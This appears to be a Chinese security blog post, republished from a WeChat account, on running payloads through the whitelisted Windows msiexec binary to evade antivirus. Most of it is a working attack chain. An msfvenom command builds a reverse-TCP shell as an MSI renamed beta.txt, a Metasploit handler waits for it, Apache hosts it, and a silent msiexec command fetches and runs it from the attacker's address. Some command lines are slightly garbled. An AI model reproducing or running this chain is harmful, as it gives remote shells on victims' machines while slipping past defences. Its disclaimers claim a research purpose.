声明:本人坚决反对利用文章内容进行恶意攻击行为,一切错误行为必将受到惩罚,绿色网络需要靠我们共同维护,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全。
msiexec是非常重要的操作系统组件,通常用来安装Windows Installer安装包,而且msiexec支持远程加载msi程序功能,因此可以通过msiexec加载远程的恶意msi程序,实现免杀的效果。其它的白名单执行payload包括:Wmic、Mshta.exe、 Regsvr32、Regsvcs、Regasm、 Rundll32、PsExec、 Cmstp.exe等。
use exploit/multi/handler
192.168.146.130 set lhost
9998 set lport
set payload windows/x64/shell/reverse_tcp
exploit -j
msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.146.130 LPORT=9998 -f msi > beta.txt
开启web服务,将beta.txt移动到web服务的根目录
sudo service apache2 start
sudo mv beta.txt /var/www/html/
C:WindowsSystem32msiexec.exe /q /i http://192.168.146.130/beta.txt
-END-
▎经典文章精选
扫描下方 二维码 加入我们吧!
原文始发于微信公众号(betasec):社会工程学 | 白名单Msiexec执行payload方式!
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论